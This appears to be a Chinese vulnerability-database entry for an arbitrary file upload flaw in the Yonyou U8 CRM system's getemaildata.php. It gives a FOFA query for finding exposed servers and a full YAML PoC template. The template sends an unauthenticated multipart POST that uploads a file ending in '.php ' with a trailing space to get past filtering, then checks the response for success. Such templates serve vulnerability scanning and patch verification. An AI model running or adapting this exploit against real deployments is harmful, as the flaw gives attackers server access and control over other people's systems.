漏洞描述
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器
FOFA: body="用友U8CRM"
yonyou-u8-crm-getemaildata-uploadfile: 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
PoC代码[已公开]
id: yonyou-u8-crm-getemaildata-uploadfile
info:
name: 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
author: peiqi
severity: high
verified: true
description: |
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器
FOFA: body="用友U8CRM"
reference:
- https://peiqi.wgpsec.org/wiki/oa/用友OA/用友%20U8%20CRM客户关系管理系统%20getemaildata.php%20任意文件上传漏洞.html
tags: yonyou,fileupload
created: 2023/08/13
set:
randstr: randomLowercase(8)
randbody: randomLowercase(30)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /ajax/getemaildata.php?DontCheckLogin=1
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php \"\r\n\
Content-Type: text/plain\r\n\
\r\n\
{{randbody}}\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
"
expression: |
response.status == 200 &&
response.body.bcontains(b'"success":true') &&
response.body.bcontains(b'.tmp.mht"') &&
response.body.bcontains(b'"filePath":')
expression: r0()